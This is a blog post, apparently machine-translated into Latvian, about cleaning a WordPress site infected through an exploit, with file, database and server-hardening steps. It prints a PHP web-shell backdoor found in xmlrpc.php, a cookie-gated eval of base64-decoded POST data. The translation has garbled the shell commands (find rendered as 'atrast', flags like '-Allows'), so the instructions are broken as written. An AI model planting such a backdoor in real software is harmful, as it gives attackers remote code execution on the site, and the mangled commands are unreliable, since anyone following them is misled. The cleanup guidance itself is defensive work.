Pirms jūs lasīt šo ziņu, jums vajadzētu redzēt post šeit, Lai saprastu kaut ko. :)
Es to atradu vairākos emuāra failos vietnē stealthsettings.com, kodi, kas līdzīgi zemāk redzamajiem, kas parādījās vīrusu infekcijas rezultātā varoņdarbs WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
Šādā gadījumā ir par failu xmlrpc.php no miegainsBet par grep serveris, izskatās diezgan daudz kodeksu šāda veida avotiem.
Tīrīšana inficēto failu:
Ooookkkk ...
1. Labākais risinājums, kad tas darīts rezervesCPC un tīrīt datu bāze ir noslaucīt failus WordPress (pēc rūpīgas pārbaudes jūs varat paturēt wp-config.php un failus, kas nav stingri saistīti ar wp platformu) un augšupielādēt oriģinālos no versijas 2.5.1 (Šajā gadījumā veikt jaunināšanas versija WP :)) http://wordpress.org/download/ . Dzēst failus ieskaitot tēmu, ja jums ir pārliecība, ka jūs varat pārbaudīt tos uzmanīgi.
Ir skaidrs, ka faili skāra un tēmas, kas nav izmantotas pirms blogā un vienkārši maina tēmu, neatrisina šo problēmu.
./andreea/wp-content/themes/default/index.php:
2. Meklēt un dzēst visus failus, kas satur: * _new.php, _old.php * * .jpgg, .giff * * .pngg un failu WP-info.txt, ja tādi ir.
atrast. -nosaukums “* _new.php”
atrast. -nosaukums “* _old.php”
atrast. -nosaukums "* .jpgg"
atrast. -nosaukums “* _giff”
atrast. -nosaukums “* _pngg”
atrast. -nosaukums “wp-info.txt”
3. uz / tmp , Meklēšanas un dzēst mapes, piemēram, tmpYwbzT2
tīrīšana SQL :
1. šajā tabulā galda wp_options redzēt, ja tur dzēst līnijas: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Viss iekš wp_options, iet uz active_plugins un noslaucīt ja ir spraudnis, kas beidzas vienā no paplašinājumiem * _new.php, _old.php * * .jpgg, .giff * * .pngg vai cits paplašinājums aizdomās turētais, rūpīgi jāpārbauda.
3. tabula wp_users, Redzēt, ja ir lietotājs, kurš nav rakstīts neko viņa labo, kolonnā user_nicename. Izdzēsiet šo lietotāju, bet atcerieties numuru ID kolonnā. Šis lietotājs, visticamāk, izmantos "WordPress"Ca USER_LOGIN Tā ir izveidota, un parādās 00: 00: 00 0000-00-00.
4. Iet uz tabulu wp_usermeta un izdzēst visas līnijas piederošos ID iepriekš.
Kad esat veicis šo SQL tīrīšanu, atspējojiet un pēc tam aktivizējiet jebkuru spraudni. (emuārā -> Informācijas panelis -> Spraudņi)
Secure serveris:
1. Redzēt, kas katalogi un faili "rakstāms"(chmod 777) un mēģiniet ievietot a chmod kas vairs nepieļaus viņu rakstīšanu nevienā līmenī. (chmod 644, piemēram)
atrast. -Allows -2 -Ls
2. Redzēt, kas faili ir mazliet iestatīts sUID vai SGID . Ja jūs neizmantojat šie faili laist tām chmod 0 vai atinstalēt paketi, ka tā satur. Tie ir ļoti bīstami, jo tie izpilda privilēģijas "grupa"Vai"sakne"Un ne ar normāliem privilēģijas lietotājs izpildes failu.
atrast / -Type f -Ls -Allows -04000
atrast / -Type f -Ls -Allows -02000
3. Pārbaudiet, kas ostas ir atvērtas, un mēģināt aizvērt vai nodrošināt tiem, kas nav izmantoti.
netstat -An | grep -i klausīties
Tik daudz. Es redzu Daži blogi ir aizliegta de Google Search un citi saka "Viņš tos labi izdarīja!!!" . Nu es to būtu izdarījis viņu vietā...bet ko tu saki, ja Google sāks banot Visas vietnes veidojot IS SPAM iešūt Trojans (Trojan.Clicker.HTML) sīkdatnēs?
1 doma par “WordPress Exploit — notīriet vīrusu failus, SQL un servera drošību.